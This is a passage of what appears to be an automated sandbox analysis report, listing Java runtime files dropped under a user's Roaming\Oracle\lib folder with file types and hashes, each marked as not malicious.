SHA-512:	18A8277A872FB9E070A1980EEE3DDD096ED0BBA755DB9B57409983C1D5A860E9CBD3B67E66FF47852FE12324B84D4984E2F13859F65FABE2FF175725898F1B67
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\calendars.properties
File Type:	ASCII text
MD5:	40A6F317D17705B4D0241F4EBB45962D
SHA1:	42EBB0988124433B8F2A6E5D9A74ED41240BCFC6
SHA-256:	D93FB6D3451D1B82256B0E31AAE7850152FA5DF76F116A9D669AA4ACE6BB68B4
SHA-512:	E4C95F8F1354833F440672C0761CE1B4895DAA52E7F143A110533F978CC6C094847AEB66636EFA6DE74B0E900FBBE79A3CC21280C4063627CE8D259068084A3A
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\charsets.jar
File Type:	Zip archive data, at least v1.0 to extract
MD5:	AD79C31213B45E9B8693F44173EC7F4E
SHA1:	68B11974C17E83E3A782B7CDF1FB881EFA9DB4D7
SHA-256:	69EDB0A20AB9005D00C5BDD0572183D3CDEAD31D8A43BF27F494440679AE046B
SHA-512:	C6D9BA45EE33A7BB045660A390E33080BDCE1A8014EB3502A49612C41040D51DC30A231D17A6E43093F08F45EBFCCFCE56DD355F8A51E98D4E13348E93A41EDC
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\classlist
File Type:	ASCII text, with CRLF line terminators
MD5:	51531CBBE256939E7AB12FCC256FBF3A
SHA1:	5754126190F818B7D39D5B725A1878FB33233D26
SHA-256:	406B68D923E9CE01F19194BCA03EAAF9FC0EFCE6590713B6D066485CD94D1339
SHA-512:	DAE90C8F429BFC7782BED9116B6A3B30110CE2B2DA865F63FEFDBD6BE965284C7D90FF8EBF869481E01246D35264110A3D8690B397CB1A109FAF61D2F937BCC2
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\cmm\CIEXYZ.pf
File Type:	Kodak Color Management System, ICC Profile
MD5:	10F23396E21454E6BDFB0DB2D124DB85
SHA1:	B7779924C70554647B87C2A86159CA7781E929F8
SHA-256:	207D748A76C10E5FA10EC7D0494E31AB72F2BACAB591371F2E9653961321FE9C
SHA-512:	F5C5F9FC3C4A940D684297493902FD46F6AA5248D2B74914CA5A688F0BAD682831F6060E2264326D2ECB1F3544831EB1FA029499D1500EA4BFE3B97567FE8444
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\cmm\GRAY.pf
File Type:	Kodak Color Management System, ICC Profile
MD5:	1002F18FC4916F83E0FC7E33DCC1FA09
SHA1:	27F93961D66B8230D0CDB8B166BC8B4153D5BC2D
SHA-256:	081CAAC386D968ADD4C2D722776E259380DCF78A306E14CC790B040AB876D424
SHA-512:	334D932D395B46DFC619576B391F2ADC2617E345AFF032B592C25E333E853735DA8B286EF7542EB19059CDE8215CDCEA147A3419ED56BDD6006CA9918D0618E1
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\cmm\LINEAR_RGB.pf
File Type:	Kodak Color Management System, ICC Profile
MD5:	A387B65159C9887265BABDEF9CA8DAE5
SHA1:	7913274C2F73BAFCF888F09FF60990B100214EDE
SHA-256:	712036AA1951427D42E3E190E714F420CA8C2DD97EF01FCD0675EE54B920DB46
SHA-512:	359D9B57215855F6794E47026C06036B93710998205D0817C6E602B2A24DAEB92537C388F129407461FC60180198F02A236AEB349A17430ED7AC85A1E5F71350
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\cmm\PYCC.pf
File Type:	Kodak Color Management System, ICC Profile
MD5:	24B9DEE2469F9CC8EC39D5BDB3901500
SHA1:	4F7EED05B8F0EEA7BCDC8F8F7AAEB1925CE7B144
SHA-256:	48122294B5C08C69B7FE1DB28904969DCB6EDC9AA5076E3F8768BF48B76204D0
SHA-512:	D23CE2623DE400216D249602486F21F66398B75196E80E447143D058A07438919A78AE0ED2DDF8E80D20BD70A635D51C9FB300E9F08A4751E00CD21883B88693
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\cmm\sRGB.pf
File Type:	Microsoft ICM Color Profile
MD5:	1D3FDA2EDB4A89AB60A23C5F7C7D81DD
SHA1:	9EAEA0911D89D63E39E95F2E2116EAEC7E0BB91E
SHA-256:	2B3AA1645779A9E634744FAF9B01E9102B0C9B88FD6DECED7934DF86B949AF7E
SHA-512:	16AAE81ACF757036634B40FB8B638D3EBA89A0906C7F95BD915BC3579E3BE38C7549EE4CD3F344EF0A17834FF041F875B9370230042D20B377C562952C47509B
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\content-types.properties
File Type:	ASCII English text
MD5:	F507712B379FDC5A8D539811FAF51D02
SHA1:	82BB25303CF6835AC4B076575F27E8486DAB9511
SHA-256:	46F47B3883C7244A819AE1161113FE9D2375F881B75C9B3012D7A6B3497E030A
SHA-512:	CB3C99883336D04C42CEA9C2401E81140ECBB7FC5B8EF3301B13268A45C1AC93FD62176AB8270B91528AC8E938C7C90CC9663D8598E224794354546139965DFE
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\currency.data
File Type:	data
MD5:	D072FB69E4C180D6704A9DA8FF64772E
SHA1:	66E52DAA2EEE4F81644816B64289C459BD009400
SHA-256:	5A55DBB9F6DD2BD6024E9F9E81B26D7FA72E74C13A0E8B0A7D5C4715A08C5739
SHA-512:	2D152A5A475878850BD3CC28D032D19624FF1ADE99465BF975BBCFFC548006E9FB60971BA416F2E623750ACF9DC266AA4B0C3A2A2761F63C00FCAEF3181E9991
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy.jar
File Type:	Zip archive data, at least v1.0 to extract
MD5:	CC16C11DBF0250885C63C58884789180
SHA1:	ECDA995FF21BA26037B236D52ED47D7151636E81
SHA-256:	1C6A481862C70D2DEF4C552B979335F2A94EA6976419D182A6937EBD7736BAAB
SHA-512:	0661EB932F34DF0308598A4EB10B808AD959E7992C82A805945313D695E5B596295281D6B08FB6E16C1C865339CA4D516DF3474E335FA1B27F2FCEDEB69F0462
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\ffjcext.zip
File Type:	Zip archive data, at least v1.0 to extract
MD5:	0A513FB75ADF2580D0F0D55D0A245C4F
SHA1:	E60C9E152965AAEC3ACA55985AC0814C3AA20E3D
SHA-256:	9EF3FC91C2DBE1E4E3C73CA1D369AC771B0A876A2312BDCDF940DE6E5331D243
SHA-512:	2C86EA09C3C6C67CECE8482CA6002BE8C6013849A4C4CD40C1B0B0B2A48B44E5EC5C18FB69A748E37AF9ECC1DBB18C1AF3E2987E54EDA3F86C23F68E071CD0C5
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages.properties
File Type:	ASCII English text
MD5:	811BAFA6F97801186910E9B1D9927FE2
SHA1:	DC52841C708E3C1EB2A044088A43396D1291BB5E
SHA-256:	926CCADAEC649F621590D1AA5E915481016564E7AB28390C8D68BDAAF4785F1F
SHA-512:	5AE9C27DCE552EA32603B2C87C1510858F86D9D10CADE691B2E54747C3602FE75DE032CF8917DCD4EE160EE4CC5BE2E708B321BB1D5CDEBFA9FE46C2F870CA7C
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_de.properties
File Type:	ASCII English text, with very long lines
MD5:	D77C3B5274B8161328AB5C78F66DD0D0
SHA1:	D989FE1B8F7904888D5102294EBEFD28D932ECDB
SHA-256:	C9399A33BB9C75345130B99D1D7CE886D9148F1936543587848C47B8540DA640
SHA-512:	696E28B6BC7E834C51AB9821D0D65D1A32F00EB15CAA732047B751288EA73D8D703D3152BF81F267147F8C1538E1BF470748DF41176392F10E622F4C7708DD92
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_es.properties
File Type:	ASCII English text, with very long lines
MD5:	6D32848BD173B9444B71922616E0645E
SHA1:	1B0334B79DB481C3A59BE6915D5118D760C97BAA
SHA-256:	BE987D93E23AB7318DB095727DEDD8461BA6D98B9409EF8FC7F5C79FA9666B84
SHA-512:	8E9E92D3229FF80761010E4878B4A33BFB9F0BD053040FE152565CFB2819467E9A92609B3786F9BDBF0D7934CF3C7D20BC3369FE1AD7D0DF7FADF561C3FDCA3C
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_fr.properties
File Type:	ASCII English text, with very long lines
MD5:	C11AB66FEDE3042EE75DFD19032C8A72
SHA1:	69BD2D03C2064F8679DE5B4E430EA61B567C69C5
SHA-256:	8DEEEC35ED29348F5755801F42675E3BF3FA7AD4B1E414ACCA283C4DA40E4D77
SHA-512:	072F8923DF111F82F482D65651758B8B4BA2486CB0EA08FB8B113F472A42A1C3BCB00DAE7D1780CF371E2C2BD955D8B66658D5EE15E548B1EEA16B312FDCBDF9
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_it.properties
File Type:	ASCII English text, with very long lines
MD5:	A81C4B0F3BF9A499429E14A881010EF6
SHA1:	DBE49949308F28540A42AE6CD2AD58AFBF615592
SHA-256:	550954F1F80FE0E73D74EB10AD529B454D5EBC626EB94A6B294D7D2ACF06F372
SHA-512:	6FED61CBCD7FE82C15C9A312ACED9D93836EBCFFAF3E13543BC9DD8B4C88400C371D2365FEEE0F1BB844A6372D4128376568A5B6FE666FD6213636FCBD8C7791
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_ja.properties
File Type:	ASCII English text, with very long lines
MD5:	B7279F1C3BA0B63806F37F6B9D33C314
SHA1:	751170A7CDEFCB1226604AC3F8196E06A04FD7AC
SHA-256:	8D499C1CB14D58E968A823E11D5B114408C010B053B3B38CFEF7EBF9FB49096F
SHA-512:	4A3BF898A36D55010C8A8F92E5A784516475BDFFFCD337D439D6DA251DDB97BCC7E26F104AC5602320019ED5C0B8DC8883B2581760AFEA9C59C74982574D164B
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_ko.properties
File Type:	ASCII English text, with very long lines
MD5:	D52D6766CD66F3967127B219E776C7B1
SHA1:	E4C609B2B7C3860B9614D74244F141D0FBC43D48
SHA-256:	4DE0D5CEAF4EB8C8C657246CB91FF8DFD6903CDA274B8ED9EDA531BDD6D499EA
SHA-512:	5CBA8878DB7F83408668FA1F4FE78BF902F488F334404FD9E744FE5F26FD3DBEFA30116F4E211A10EC7CD49325DD27E8A2021AEA27603E46AACCD6D83F6C2084
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_pt_BR.properties
File Type:	ASCII English text, with very long lines
MD5:	9BB1253A3F79152EA273CF6A52A18080
SHA1:	C1084130F767D3955DAC9C89C2CC67C59A9BBB8C
SHA-256:	40AEB9EB0AB79BE2D25764CBC16E5388A3BE12EBAF10E96837FEEECF44354948
SHA-512:	6396CBBE7672A7A2E7C3B7B64C150A13356C8EDDAC84B764789C1C421942F1BC5A166D635CE1DC122050BB8A9985BFDA96B25C2ADF52409AF981BD89FC4DB5C9
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_sv.properties
File Type:	ASCII English text, with very long lines
MD5:	A6005BE45C88900A15BC80D461B60C30
SHA1:	CA3E18B5AEA928A8465656C86970D9584D85EF7F
SHA-256:	5CCEE63720FCAC2A136CF1FA90CBAC05040F89FFE8C082C2D067247BFCD76B87
SHA-512:	9442FFB47BF0F158A44A81A16B2AB94BB36FAC2F75B0C9467654AB9A8DF26A63C0C7A7717DEAF5476068BC0A0D602B828CE1E8D229CBFAAF201C24C0F78BE1F9
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_zh_CN.properties
File Type:	ASCII English text, with very long lines
MD5:	E6F84C081895ACDFD98DA0F496E1DD3D
SHA1:	1C2B96673DDDD3596890EF4FC22017D484A1F652
SHA-256:	A1752A0175F490F61E0AAD46DC6887C19711F078309062D5260E164AC844F61A
SHA-512:	D4D28780147E22678CD8E7415CACFAD533AE5AF31D74426BBE4993F05A0707E4F0F71D948093FFA1A0D6EA48310E901CD0ED1C14E2FBDF69C92462D070A9664F
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_zh_HK.properties
File Type:	ASCII English text, with very long lines
MD5:	880BAACB176553DEAB39EDBE4B74380D
SHA1:	37A57AAD121C14C25E149206179728FA62203BF0
SHA-256:	FF4A3A92BC92CB08D2C32C435810440FD264EDD63E56EFA39430E0240C835620
SHA-512:	3039315BB283198AF9090BD3D31CFAE68EE73BC2B118BBAE0B32812D4E3FD0F11CE962068D4A17B065DAB9A66EF651B9CB8404C0A2DEFCE74BB6B2D1D93646D5
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_zh_TW.properties
File Type:	ASCII English text, with very long lines
MD5:	880BAACB176553DEAB39EDBE4B74380D
SHA1:	37A57AAD121C14C25E149206179728FA62203BF0
SHA-256:	FF4A3A92BC92CB08D2C32C435810440FD264EDD63E56EFA39430E0240C835620
SHA-512:	3039315BB283198AF9090BD3D31CFAE68EE73BC2B118BBAE0B32812D4E3FD0F11CE962068D4A17B065DAB9A66EF651B9CB8404C0A2DEFCE74BB6B2D1D93646D5
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\splash.gif
File Type:	GIF image data, version 89a, 320 x 139
MD5:	249053609EAF5B17DDD42149FC24C469
SHA1:	20E7AEC75F6D036D504277542E507EB7DC24AAE8
SHA-256:	113B01304EBBF3CC729A5CA3452DDA2093BD8B3DDC2BA29E5E1C1605661F90BE
SHA-512:	9C04A20E2FA70E4BCFAC729E366A0802F6F5167EA49475C2157C8E2741C4E4B8452D14C75F67906359C12F1514F9FB7E9AF8E736392AC8434F0A5811F7DDE0CB
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\splash@2x.gif
File Type:	GIF image data, version 89a, 640 x 278
MD5:	CB81FED291361D1DD745202659857B1B
SHA1:	0AE4A5BDA2A6D628FAC51462390B503C99509FDC
SHA-256:	9DD5CCD6BDFDAAD38F7D05A14661108E629FDD207FC7776268B566F7941E1435
SHA-512:	4A383107AC2D642F4EB63EE7E7E85A8E2F63C67B41CA55EBAE56B52CECFE8A301AAF14E6536553CBC3651519DB5C10FC66588C84C9840D496F5AE980EF2ED2B9
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\access-bridge.jar
File Type:	Zip archive data, at least v2.0 to extract
MD5:	C5C5D8091EB8B17BE27E67495CE21B60
SHA1:	4F937B199C9C0253CF6165D71365257832889AD6
SHA-256:	EFCABCC8B2D323B9B2C6131BFB8D661E6CF292024BC5007D9EBF373634459087
SHA-512:	4B65AD668184587ED6ADC7B4E12FD16D4C728D5C6A0B26319F9D6B016EA6E355DA11B3335160C575030F83595FBDD05AA874661E641E3BBFE9B5FCB6515A5A9E
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\cldrdata.jar
File Type:	Zip archive data, at least v2.0 to extract
MD5:	2C821D026B8E545C3FC5DFC82B71988A
SHA1:	8EE70535BB51179B32ECFCB251BF6AD93F37B0EB
SHA-256:	CBDF68A18575354F452621FB05B973C12ACAA0A9728EE7094FB2977A017740FF
SHA-512:	0558C4B72C039DF9289DC9688D21ABBA2E8243518F58A7314DBBF23C2A2B4345C77195AB36E17DBF83C6268725C5A2E860A69F329558B2096C9C6985A936DCA0
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\dnsns.jar
File Type:	Zip archive data, at least v2.0 to extract
MD5:	010850B4AA1CA2C192CE702680624899
SHA1:	180CCBF76FF1A38B7EBCFC0BD50C1350E6BE5848
SHA-256:	C18ACE3882EA378BA8249EC0130E903EB3C5D22383665D840F02A6B5853DB7D6
SHA-512:	775E9AD56700E3D8BFF00490CD8307D6C9C107C87250624A45FDEA9AB21A9CAD020BB1D30214EDABEC50B6773FF12319F9982E22A6F97567C3BF36C9BA6F876A
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\jaccess.jar
File Type:	Zip archive data, at least v2.0 to extract
MD5:	A471401C2DC7004F19C9480EAB1F5342
SHA1:	36506B08B8C157020F0857B5E960E9F57D1CD01B
SHA-256:	BD0FC91B2F8B54CD18C80ECA1F1D5FA89D2570DC8733B04989F2FA53477046A3
SHA-512:	F7F05066ED3E435343427A82437B015DD36DB69B2E57A1C585544DAE71B8D06B741D4CFA06F37CAB2B387D91B36D759A6164C3B3A001E828C2AD797EE2BA273E
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\jfxrt.jar
File Type:	Zip archive data, at least v1.0 to extract
MD5:	233C336D057EACF0B3024743291A5F31
SHA1:	98B521B98BA5C73A39A3EB3FD2FDBF4D7FFB21CC
SHA-256:	B4786E2C5C4C832878ED7B526927E339BC1F02C98C18C34370F29E383037EFCA
SHA-512:	CEBA1DF8E5677FD36072D1C1D95B8388CF1BE9C4481396B3CA8A00E46F97C981DB62053CE592A88B7EDDC2BC204E071C7AA8402524738AF32D830999386776D7
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\localedata.jar
File Type:	Zip archive data, at least v1.0 to extract
MD5:	0D14084BFE6F9F68799F11D02E8D2CA9
SHA1:	381307DD45AE6D5DE62D49041238C559C121682C
SHA-256:	414D2A6D6ABD2D3ED746EE2B1001A8EBA01CA957B35BFEED78117F9FE82C7390
SHA-512:	D98D5B215B8A62FB68853673E9FFF922D51911DE5B71BDBC44D5D29C89DF10D2D5551A2E1A4C73BED9E53574F9169195A5F7E03300720621E96699FBA565D7C6
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\meta-index
File Type:	ASCII text, with CRLF line terminators
MD5:	77ABE2551C7A5931B70F78962AC5A3C7
SHA1:	A8BB53A505D7002DEF70C7A8788B9A2EA8A1D7BC
SHA-256:	C557F0C9053301703798E01DC0F65E290B0AE69075FB49FCC0E68C14B21D87F4
SHA-512:	9FE671380335804D4416E26C1E00CDED200687DB484F770EBBDB8631A9C769F0A449C661CB38F49C41463E822BEB5248E69FD63562C3D8C508154C5D64421935
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\nashorn.jar
File Type:	Zip archive data, at least v2.0 to extract
MD5:	1737CA1ED326BC1A2F65D00CFF35F81B
SHA1:	BF0C9EA9D8A4C81FE9776F7FA64DE2046B47FF73
SHA-256:	62C7B89EA2B135E34864627B9CFBBB774B23AC22A13E8826E3CEDFBF2C362F79
SHA-512:	C3F676CAD64A18B0E8216DA4D8F8B439C948BA51E5D7F8E28AA963DA3EEBBBA77B534C47A82C2C822A3F656F4079383F97F1D944E0F00ED6A1D98A4BE563B0F6
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\sunec.jar
File Type:	Zip archive data, at least v2.0 to extract
MD5:	65E841CBFF7777C462C064A105CD6693
SHA1:	2A168E4DD5F0385CCDE79CE9EDF6643E6D1CBC97
SHA-256:	869EA30322A9DB85878A15FC0120DFD486D10DF1D8FB3ADEDA0EC3863B08DCE5
SHA-512:	115EF69F0D7D39F74828CD66719E441310D98D98D69FF9071BD7377BAFAF392F01139DCEC314C0833F815084950072DEF3AD61D9884AF55CCAE487F42259175F
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\sunjce_provider.jar
File Type:	Zip archive data, at least v2.0 to extract
MD5:	7B66C8DBEA43BBFEF0CEA5BC001BBE7C
SHA1:	B5FDBBFE2AA789F17EDBBB930DFCEAFF5AC03C7F
SHA-256:	1B2F1E5353951B082E2AD4D29971645F0FA9C021A98927B45D2D62EE3CF5F94D
SHA-512:	2F71714672B8231013F895EA1D070FEBEB6EAAFECB1E7AA46F6B51EA96A40875AEB932B2F705215C3A489DC394492D85374B419D249A73039DCDCF83AB274806
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\sunmscapi.jar
File Type:	Zip archive data, at least v2.0 to extract
MD5:	352D3349BC9293814990A1579062C575
SHA1:	4C517B0332501940A54306743C233C6E5E15D2B2
SHA-256:	1F910115E8E774FF59252124E293BC24BA6A2FCEE50FB888054493EFCCCDCAEA
SHA-512:	7A29241099147202E65E45FFCC295910ED94B7D190FF46F0C09C6E151C010627EB1B560BD6055E0B8422A0014AA52CC8F4ED13375D618A27A03956227D327C67
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\sunpkcs11.jar
File Type:	Zip archive data, at least v2.0 to extract
MD5:	4FAD19CDFD32D9F58E03D45DF2939601
SHA1:	A3F1050C75D139479EB4FC100936FC08A9385BD1
SHA-256:	96D9AAB3F041ECD20694601D5F0B236D05D1845DF40B03B692328A030101C64C
SHA-512:	593E86E7C0F53A322AD3A21A1B06B6A6CD006265ECA9358CC92432D683D1F6165F39D0E21D5E06E58DF1E9458F1F561E7D93AD117F9E461BB1A74272E30BA20B
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\zipfs.jar
File Type:	Zip archive data, at least v2.0 to extract
MD5:	7E6B85454069F4B0F9E2D2151079FAD5
SHA1:	5AD979A141C0FFAFAB1200DB2A68F149EC94F3C1
SHA-256:	7B095A4C0531FA2860D9A33AD8E0875FD1538B4DB46BC07FFDB7DBFEF1BF5DD3
SHA-512:	EE88354462F028F0FEC12F5E8379E116B9CEA0B83E714DCA2B062A3A86B7336D532FDE289A193F2D366E6BD9F9EAB465B509B2487C6E34EF06FBFE1F2BD5CCD8
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\flavormap.properties
File Type:	ASCII English text
MD5:	D8B47B11E300EF3E8BE3E6E50AC6910B
SHA1:	2D5ED3B53072B184D67B1A4E26AEC2DF908DDC55
SHA-256:	C2748E07B59398CC40CACCCD47FC98A70C562F84067E9272383B45A8DF72A692
SHA-512:	8C5F3E1619E8A92B9D9CF5932392B1CB9F77625316B9EEF447E4DCE54836D90951D9EE70FFD765482414DD51B816649F846E40FD07B4FBDD5080C056ADBBAE6F
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\fontconfig.bfc
File Type:	raw G3 data
MD5:	E0E5428560288E685DBFFC0D2776D4A6
SHA1:	2AE70624762C163C8A1533F724AA5A511D8B208E
SHA-256:	AAE23ACC42F217A63D675F930D077939765B97E9C528B5659842515CA975111F
SHA-512:	C726CC2898399579AFA70ACACE86BEC4369D4541112243E51721568B4D25DCC6C66FA64AC475AFF9BA9DE07A630B24A9F221FA00426AD36845203BA809219E3C
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\fontconfig.properties.src
File Type:	ASCII text
MD5:	1C2FFEA868138A14FCF8FFCC375A0AB1
SHA1:	D1B1A3C3658FA5C42B8090B60D379A3F0D3EA934
SHA-256:	2F3067FB80574523307836E50990F575AA50ACA3BC4FED9BCBDEA291D36012A2
SHA-512:	5D8116A78974C395C44FC8BC377E2A33914BB218BC6BA1E546279639C071793A420BF95BA39B0B18C9AC4865438EEDFAA4C7A81A31673D234306A858C5D7679B
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaBrightDemiBold.ttf
File Type:	TrueType font data
MD5:	AF0C5C24EF340AEA5CCAC002177E5C09
SHA1:	B5C97F985639E19A3B712193EE48B55DDA581FD1
SHA-256:	72CEE3E6DF72AD577AF49C59DCA2D0541060F95A881845950595E5614C486244
SHA-512:	6CE87441E223543394B7242AC0CB63505888B503EC071BBF7DB857B5C935B855719B818090305E17C1197DE882CCC90612FB1E0A0E5D2731F264C663EB8DA3F9
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaBrightDemiItalic.ttf
File Type:	TrueType font data
MD5:	793AE1AB32085C8DE36541BB6B30DA7C
SHA1:	1FD1F757FEBF3E5F5FBB7FBF7A56587A40D57DE7
SHA-256:	895C5262CDB6297C13725515F849ED70609DBD7C49974A382E8BBFE4A3D75F8C
SHA-512:	A92ADDD0163F6D81C3AEABD63FF5C293E71A323F4AEDFB404F6F1CDE7F84C2A995A30DFEC84A9CAF8FFAF8E274EDD0D7822E6AABB2B0608696A360CABFC866C6
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaBrightItalic.ttf
File Type:	TrueType font data
MD5:	4D666869C97CDB9E1381A393FFE50A3A
SHA1:	AA5C037865C563726ECD63D61CA26443589BE425
SHA-256:	D68819A70B60FF68CA945EF5AD358C31829E43EC25024A99D17174C626575E06
SHA-512:	1D1F61E371E4A667C90C2CE315024AE6168E47FE8A5C02244DBF3DF26E8AC79F2355AC7E36D4A81D82C52149197892DAED1B4C19241575256BB4541F8B126AE2
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaBrightRegular.ttf
File Type:	TrueType font data
MD5:	630A6FA16C414F3DE6110E46717AAD53
SHA1:	5D7ED564791C900A8786936930BA99385653139C
SHA-256:	0FAAACA3C730857D3E50FBA1BBAD4CA2330ADD217B35E22B7E67F02809FAC923
SHA-512:	0B7CDE0FACE982B5867AEBFB92918404ADAC7FB351A9D47DCD9FE86C441CACA4DD4EC22E36B61025092220C0A8730D292DA31E9CAFD7808C56CDBF34ECD05035
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaSansDemiBold.ttf
File Type:	TrueType font data
MD5:	5DD099908B722236AA0C0047C56E5AF2
SHA1:	92B79FEFC35E96190250C602A8FED85276B32A95
SHA-256:	53773357D739F89BC10087AB2A829BA057649784A9ACBFFEE18A488B2DCCB9EE
SHA-512:	440534EB2076004BEA66CF9AC2CE2B37C10FBF5CC5E0DD8B8A8EDEA25E3613CE8A59FFCB2500F60528BBF871FF37F1D0A3C60396BC740CCDB4324177C38BE97A
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaSansRegular.ttf
File Type:	TrueType font data
MD5:	B75309B925371B38997DF1B25C1EA508
SHA1:	39CC8BCB8D4A71D4657FC92EF0B9F4E3E9E67ADD
SHA-256:	F8D877B0B64600E736DFE436753E8E11ACB022E59B5D7723D7D221D81DC2FCDE
SHA-512:	9C792EF3116833C90103F27CFD26A175AB1EB11286959F77062893A2E15DE44D79B27E5C47694CBBA734CC05A9A5BEFA72E991C7D60EAB1495AAC14C5CAD901D
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaTypewriterBold.ttf
File Type:	TrueType font data
MD5:	A0C96AA334F1AEAA799773DB3E6CBA9C
SHA1:	A5DA2EB49448F461470387C939F0E69119310E0B
SHA-256:	FC908259013B90F1CBC597A510C6DD7855BF9E7830ABE3FC3612AB4092EDCDE2
SHA-512:	A43CF773A42B4CEBF4170A6C94060EA2602D2D7FA7F6500F69758A20DC5CC3ED1793C7CEB9B44CE8640721CA919D2EF7F9568C5AF58BA6E3CF88EAE19A95E796
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaTypewriterRegular.ttf
File Type:	TrueType font data
MD5:	C1397E8D6E6ABCD727C71FCA2132E218
SHA1:	C144DCAFE4FAF2E79CFD74D8134A631F30234DB1
SHA-256:	D9D0AAB0354C3856DF81AFAC49BDC586E930A77428CB499007DDE99ED31152FF
SHA-512:	DA70826793C7023E61F272D37E2CC2983449F26926746605C550E9D614ACBF618F73D03D0C6351B9537703B05007CD822E42E6DC74423CB5CC736B31458D33B1
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\hijrah-config-umalqura.properties
File Type:	ASCII English text
MD5:	1EDDFB1EE252055556F40CDC79632E98
SHA1:	84AA425100740722E91F4725CAF849E7863D12BA
SHA-256:	69BECFE0D45B62BBDBCF6FE111A8A3A041FB749B6CF38E8A2F670607E17C9EE2
SHA-512:	A0FDBF42FF105C9A2F12179124606A720DF8F32365605644E15600767E5732312777A58390FDB1A9B1C0B152CCC29496133B278A6E5736B38AF2B5FAB251D40C
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\i386\jvm.cfg
File Type:	ASCII English text
MD5:	9AEF14A90600CD453C4E472BA83C441F
SHA1:	10C53C9FE9970D41A84CB45C883EA6C386482199
SHA-256:	9E86B24FF2B19D814BBAEDD92DF9F0E1AE86BF11A86A92989C9F91F959B736E1
SHA-512:	481562547BF9E37D270D9A2881AC9C86FC8F928B5C176E9BAF6B8F7B72FB9827C84EF0C84B60894656A6E82DD141779B8D283C6E7A0E85D2829EA071C6DB7D14
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\cursors.properties
File Type:	ASCII English text
MD5:	269D03935907969C3F11D43FEF252EF1
SHA1:	713ACB9EFF5F0B14A109E6C2771F62EAC9B57D7C
SHA-256:	7B8B63F78E2F732BD58BF8F16144C4802C513A52970C18DC0BDB789DD04078E4
SHA-512:	94D8EE79847CD07681645D379FEEF6A4005F1836AC00453FB685422D58113F641E60053F611802B0FF8F595B2186B824675A91BF3E68D336EF5BD72FAFB2DCC5
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\invalid32x32.gif
File Type:	GIF image data, version 89a, 32 x 32
MD5:	1E9D8F133A442DA6B0C74D49BC84A341
SHA1:	259EDC45B4569427E8319895A444F4295D54348F
SHA-256:	1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
SHA-512:	63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\win32_CopyDrop32x32.gif
File Type:	GIF image data, version 89a, 31 x 32
MD5:	89CDF623E11AAF0407328FD3ADA32C07
SHA1:	AE813939F9A52E7B59927F531CE8757636FF8082
SHA-256:	13C783ACD580DF27207DABCCB10B3F0C14674560A23943AC7233DF7F72D4E49D
